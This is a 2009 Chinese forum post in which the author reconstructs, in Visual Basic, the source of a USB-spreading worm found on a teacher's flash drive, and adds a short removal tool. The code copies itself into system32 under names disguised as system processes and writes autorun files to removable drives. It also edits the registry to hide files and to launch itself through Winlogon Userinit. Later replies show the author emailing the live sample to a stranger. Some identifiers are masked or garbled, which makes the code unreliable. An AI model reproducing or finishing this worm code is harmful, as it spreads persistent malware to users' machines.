  病毒已经分析完了,但好不容易找到一个软柿子,不练手总觉得亏得慌,
  顺便给他还原一下把
  
  
  Private Declare Function GetWindowsDirectory Lib "kernel32" Alias "GetWindowsDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
  Private Declare Function GetSystemDirectory Lib "kernel32" Alias "GetSystemDirectoryA" (ByVal lpBuffer As String, ByVal nSize As Long) As Long
  Private Declare Function FindWindow Lib "user32" Alias "FindWindowA" (ByVal lpClassName As String, ByVal lpWindowName As String) As Long
  Private Declare Function PostMessage Lib "user32" Alias "[s:9]ostMessageA" (ByVal hwnd As Long, ByVal wMsg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
  Private Declare Function GetDriveType Lib "kernel32" Alias "GetDriveTypeA" (ByVal nDrive As String) As Long
  Private Declare Function GetFileAttributes Lib "kernel32" Alias "GetFileAttributesA" (ByVal lpFileName As String) As Long
  
  Private Const WM_CLOSE = &H10
   Dim Swindir As String * 255, Ssysdir As String * 255, Spath As String
   Dim Sexename As String
   Dim Span As String
  Private Sub Form_Load()
  
  Me.Hide
  App.TaskVisible = False
  
  
   '第一步
   dtemp = GetWindowsDirectory(Swindir, 255)
   '第二步
   dtemp = dtemp * GetSystemDirectory(Ssysdir, 255)
   If dtemp = 0 Then End
   '第三步
   Sexename = App.EXEName
   Spath = XXXXXXth
   Span = Mid(Spath, 2, 1)
   '第四五步
   If Sexename = "desktop.exe" Then
  '第六步
    Call function4
  
    dtemp = FindWindow(vbNullString, "我的电脑")
    dtemp = PostMessage(dtemp, WM_CLOSE, 0, 0)
    '第七步
    Shell Swindir + "explorer.exe /n," + Spath
    '第八步
    MkDir Ssysdir + "\scvhost"
    '第九步
    FileCopy Spath + "\" + Sexename, Ssysdir + "\scvhost\svchost.exe"
    SetAttr Ssysdir + "\scvhost\svchost.exe", vbHidden + vbSystem
    '第十步
    Open Ssysdir + "\XXXXXXXXXXi" For Output As #2
     Print #2, Chr(34) + Mid(Spath, 1, 1) + Chr(34)
    Close #2
    '第十一步
    FileCopy Ssysdir + "\mswinsck.ocx", Spath + "\mswinsck.ocx"
    SetAttr Spath + "\mswinsck.ocx", vbHidden + vbSystem
    '第十二步
    FileCopy Spath + "\" + Sexename, Ssysdir + "usb2.exe"
    SetAttr Ssysdir + "\usb2.exe", vbHidden + vbSystem
    '第十三步
    FileCopy Spath + "\" + Sexename, Ssysdir + "\wuauserv.exe"
    SetAttr Ssysdir + "\wuauserv.exe", vbHidden + vbSystem
    '第十四步
    Call function5
    Shell Ssysdir + "\scvhost\svchost.exe"
  
   End If
  
   '第十五十六步
   If Sexename = "svchost.exe" Then
   '第十七步
    Open Ssysdir + "\XXXXXXXXXXi" For Input As #2
     Line Input #2, stemp
    Close #2
    Span = Mid(stemp, 2, 1)
    '第十八步
    Call function4
    '第十九步
    FileCopy Ssysdir + "\usb2.exe", Ssysdir + "\wuauserv.exe"
    SetAttr Ssysdir + "\wuauserv.exe"
   End If
  
   '第二十步
  End Sub
  
  Private Sub Timer1_Timer()
  '第一步
   dtemp = GetDriveType(Span + ":\")
   If dtemp <> 1 Then
    dtemp = GetFileAttributes(Span + ":\desktop2.exe")
    If dtemp <> 0 Then '第二步
     FileCopy Spath + "\" + Sexename, Span + ":\desktop2.exe" '第三步
     dtemp = GetFileAttributes(Span + ":\XXXXXXXXXXf")
     If dtemp <> 0 Then Kill Span + ":\XXXXXXXXXXf" '第四五步
    
     Open Span + ":\XXXXXXXXXXf" For Output As #1
      Print #1, "[AutoRun]"
      Print #1, "Shell = verb1"
      Print #1, "shell\verb1\command=desktop.exe"
      Print #1, "shell\verb1=打开(&O)"
      Print #1, "shell=Auto"
     Close #1
     SetAttr Ssysdir + "\XXXXXXXXXXf", vbSystem + vbHidden
     '第六步
    
     FileCopy Ssysdir + "\mswinsck.ocx", Span + ":\folder.exe"
     '第七步
     SetAttr Spath + ":\folder.exe", vbSystem + vbHidden
     '第八步
    
    End If
   End If
  End Sub
  Sub function5() '修改注册表实现隐藏文件
  f = FreeFile
  
   Open Ssysdir + "\XXXXXXXXXXXg" For Output As #f
    Print #f, "REGEDIT4"
    Print #f, "[HKEY_LOCAL_MACHINE\Software\Microsoft\windows\CurrentVersion\explorer\Advanced\Folder\Hidden\SHOWALL]"
    Print #f, Chr(34) + "CheckedValue" + Chr(34) + "=dword:0"
    Print #f, "[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"
    Print #f, Chr(34) + "Hidden" + Chr(34) + "=dword:2"
    Print #f, "[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"
    Print #f, Chr(34) + "SuperHidden" + Chr(34) + "=dword:1"
    Print #f, "[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced]"
    Print #f, Chr(34) + "ShowSuperHidden" + Chr(34) + "=dword:0"
   Close #f
   Shell "regedit.exe /s" + Ssysdir + "\XXXXXXXXXXXg"
      SetAttr Ssysdir + "\XXXXXXXXXXXg", vbSystem + vbHidden
  End Sub
  
  Sub function6() '修改注册表实现自启动
   f = FreeFile
  
   Open Ssysdir + "\XXXXXXXXXXg" For Output As #f
    Print #f, "REGEDIT4"
    Print #f, ""
    Print #f, "[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]"
  Print #f, Chr(34) + "Userinit" + Chr(34) + "=" + Chr(34) + "userinit.exe,C:\\WINDOWS\\system32\\scvhost\\svchost.exe,wuauserv.exe" + Chr(34)
   Close #f
   Shell "regedit.exe /s" + Ssysdir + "\XXXXXXXXXXg"
      SetAttr Ssysdir + "\XXXXXXXXXXg", vbSystem + vbHidden
  End Sub
  ===============================================
  专杀:
  Private Sub Command1_Click()
   On Error Resume Next
   Kill "c:\windows\system32\scvhost\svchost.exe"
   Kill "c:\windows\system32\XXXXXXXXXXi"
   Kill "c:\windows\system32\usb2.exe"
   Kill "c:\windows\system32\wuauserv.exe"
   For i = Asc("c") To Asc("z")
    Kill Chr(i) + ":\desktop2.exe"
    Kill Chr(i) + ":\XXXXXXXXXXf"
   Next
   Shell "regsvr32 /s XXXXXXg"
   Shell "regsvr32 /s XXXXXXg"
  End Sub  
  
  具体看附件。没调试,如果有编译错误……呵呵
  
-------------------------------------------------------------------------------

转载请注明作者并保持文章的完整, 谢谢!

                                                       2009年04月11日 2:40:29

-------------------------------------------------------------------------------+
  山坡下的一片杜鹃已经开花了,远处的青山被春雨洗得青翠如玉,一双蝴蝶飞入花丛,又飞出来,庭院寂寂,仿佛已在红尘外。

attachment icon 逆向.rar 2.35KB RAR 40次下载

attachment icon 病毒.rar 75.88KB RAR 43次下载

attachment icon 专杀.rar 4.53KB RAR 50次下载
+721  科创币    delete    2009/05/08 个人加分
+2738  科创币    delete    2009/05/08 wonderful
+1000  科创币    小光telnet    2009/05/08 分享有价值的原创资料
来自:计算机科学 / 软件综合
33
 
已屏蔽 原因:{{ notice.reason }}已屏蔽
{{notice.noticeContent}}
~~空空如也
noname剑人 作者
15年9个月前 IP:未同步
98315
55555555555鬼知道论坛的字号这么大啊

没法修改了,720分钟已过。等待斑竹降临
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
15年9个月前 IP:未同步
98692
呵呵
这个病毒很弱智的,我都怀疑作者是不是个VB新手(这个样本是我从老师的U盘里找到了,我都怀疑是老师自己双击打开的病毒,.......无语)

呵呵,经历吗,不敢瞎说,这里深藏不露的人很多,还是不说以免贻笑大方了
引用
评论
1
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
15年9个月前 IP:未同步
99241
难道楼上是手里揣着vm地下注册版的......
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
15年9个月前 IP:未同步
99363
???太冷了……
改下错字吧
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
15年9个月前 IP:未同步
99521
膜拜
看不懂
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
15年6个月前 IP:未同步
133680
....但估计改的人很少……
              
.
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
14年10个月前 IP:未同步
207923
Re:回 楼主(noname剑人) 的帖子
引用第26楼nxl520于2010-04-06 19:54发表的 回 楼主(noname剑人) 的帖子 :
你的病毒下载下来为什么不能解压?麻烦楼主能不能给我重新发个好的文件到我邮箱 我想学习学习。谢谢了,jay92013@XXXXXXX


被杀软报了吧……
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
14年9个月前 IP:未同步
210612
引用第28楼nxl520于2010-04-17 22:53发表的  :
什么意思 不能下载了?楼主你也没有成品了?


恩……我翻翻看……我是说你那里是不是被杀软干掉了……
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
14年9个月前 IP:未同步
213244
引用第30楼nxl520于2010-04-28 14:22发表的  :
你给我发的是加密文件 我解压要密码 密码是多少啊?

在邮件里不是说了吗?别告我传播病毒啊……
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论
noname剑人作者
14年8个月前 IP:未同步
216924
引用第32楼nxl520于2010-05-09 17:06发表的  :
  你给我发的那个病毒怎么有错误 没有效果出来啊?

……………………i do not know
引用
评论
加载评论中,请稍候...
200字以内,仅用于支线交流,主线讨论请采用回复功能。
折叠评论

想参与大家的讨论?现在就 登录 或者 注册

所属专业
上级专业
同级专业
noname剑人
学者 笔友
文章
48
回复
430
学术分
3
2008/07/22注册,6年11个月前活动
暂无简介
主体类型:个人
所属领域:无
认证方式:邮箱
IP归属地:未同步
文件下载
加载中...
{{errorInfo}}
{{downloadWarning}}
你在 {{downloadTime}} 下载过当前文件。
文件名称:{{resource.defaultFile.name}}
下载次数:{{resource.hits}}
上传用户:{{uploader.username}}
所需积分:{{costScores}},{{holdScores}}下载当前附件免费{{description}}
积分不足,去充值
文件已丢失

当前账号的附件下载数量限制如下:
时段 个数
{{f.startingTime}}点 - {{f.endTime}}点 {{f.fileCount}}
视频暂不能访问,请登录试试
仅供内部学术交流或培训使用,请先保存到本地。本内容不代表科创观点,未经原作者同意,请勿转载。
音频暂不能访问,请登录试试
支持的图片格式:jpg, jpeg, png
插入公式
评论控制
加载中...
文号:{{pid}}
投诉或举报
加载中...
{{tip}}
请选择违规类型:
{{reason.type}}

空空如也

加载中...
详情
详情
推送到专栏从专栏移除
设为匿名取消匿名
查看作者
回复
只看作者
加入收藏取消收藏
收藏
取消收藏
折叠回复
置顶取消置顶
评学术分
鼓励
设为精选取消精选
管理提醒
编辑
通过审核
评论控制
退修或删除
历史版本
违规记录
投诉或举报
加入黑名单移除黑名单
查看IP
{{format('YYYY/MM/DD HH:mm:ss', toc)}}